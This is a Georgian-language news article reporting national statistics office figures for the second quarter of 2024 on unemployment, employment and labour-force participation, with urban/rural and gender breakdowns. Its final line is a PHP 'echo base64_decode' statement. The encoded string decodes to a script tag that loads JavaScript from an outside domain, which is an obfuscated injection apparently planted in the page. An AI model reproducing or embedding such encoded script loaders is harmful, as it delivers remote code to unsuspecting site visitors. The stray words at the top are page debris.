celsiusi
ავერსი შნაიდერი
 სტატისტიკის ეროვნული სამსახუროს მონაცემებით, 2024 წლის მეორე კვარტალში საქართველოში უმუშევრობის დონე, წია წლის შესაბამის პერიოდთან შედარებით, 3.1 პროცენტული პუნქტით შემცირდა და 13.7 პროცენტი შეადგინა.

 

საქსტატის ცნობით, 2024 წლის მეორე კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, დაქირავებულთა რიცხოვნობა გაიზარდა 19.1 ათასი კაცით (2.1%) და 935.8 ათასს მიაღწია, ხოლო თვითდასაქმებულთა რიცხოვნობა 41.3 ათასით გაიზარდა (10.1%) და 451.5 ათასი შეადგინა. ამავე პერიოდში უმუშევართა რაოდენობა შემცირდა 47.2 ათასით (17.7%) და 219.7 ათასი შეადგინა.

2024 წლის მეორე კვარტალში სამუშაო ძალის მონაწილეობის დონე (სამუშაო ძალის წილი 15 წლის და უფროსი ასაკის მოსახლეობაში), წინა წლის შესაბამის პერიოდთან შედარებით, 1.3 პროცენტული პუნქტით გაიზარდა და 54.5 პროცენტით განისაზღვრა, ხოლო დასაქმების დონე გაიზარდა 2.8 პროცენტული პუნქტით და 47.0 პროცენტი შეადგინა.

სამუშაო ძალის მონაწილეობის დონე როგორც ქალაქის, ისე სოფლის ტიპის დასახლებებში გაზრდილია 1.3 პროცენტული პუნქტით, ხოლო დასაქმების დონე ქალაქის ტიპის დასახლებებში გაზრდილია 3.0 პროცენტული პუნქტით, ხოლო სოფლის ტიპის დასახლებებში – 2.5 პროცენტული პუნქტით, შესაბამისად 47.9 პროცენტს და 45.8 პროცენტს შეადგენს.

ამასთან, უწყების ანგარიშით, 2024 წლის მეორე კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, დაქირავებულთა წილი დასაქმებულთა საერთო რაოდენობაში 1.6 პროცენტული პუნქტით შემცირდა და 67.5 პროცენტი შეადგინა.

საქსტატის ინფორმაციით, 2024 წლის მეორე კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, უმუშევრობის დონე საქალაქო ტიპის დასახლებებში შემცირებულია 3.5 პროცენტული პუნქტით, ხოლო სოფლის ტიპის დასახლებებში – 2.5 პროცენტული პუნქტით. უმუშევრობის დონე ტრადიციულად მაღალია კაცებში, ქალებთან შედარებით. 2024 წლის მეორე კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, აღნიშნული მაჩვენებელი 3.6 პროცენტული პუნქტით არის შემცირებული ქალებში, ხოლო კაცებში – 2.6 პროცენტული პუნქტით, შესაბამისად 10.9 პროცენტს და 15.9 პროცენტს შეადგენს.

სამუშაო ძალის მონაწილეობის დონე ქალებთან შედარებით მაღალია კაცებში. 2024 წლის მეორე კვარტალში აღნიშნული მაჩვენებელი ქალებში 44.4 პროცენტს, ხოლო კაცებში 66.1 პროცენტს შეადგენდა. წინა წლის შესაბამის პერიოდთან შედარებით, სამუშაო ძალის მონაწილეობის დონე ქალებში გაზრდილია 1.5 პროცენტული პუნქტით, ხოლო კაცებში – 1.0 პროცენტული პუნქტით.

უწყების მონაცემებით, 2024 წლის მეორე კვარტალში, წინა წლის შესაბამის პერიოდთან შედარებით, დასაქმების დონე გაზრდილია ქალებში 2.9 პროცენტული პუნქტით, ხოლო კაცებში – 2.6 პროცენტული პუნქტით.

111
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");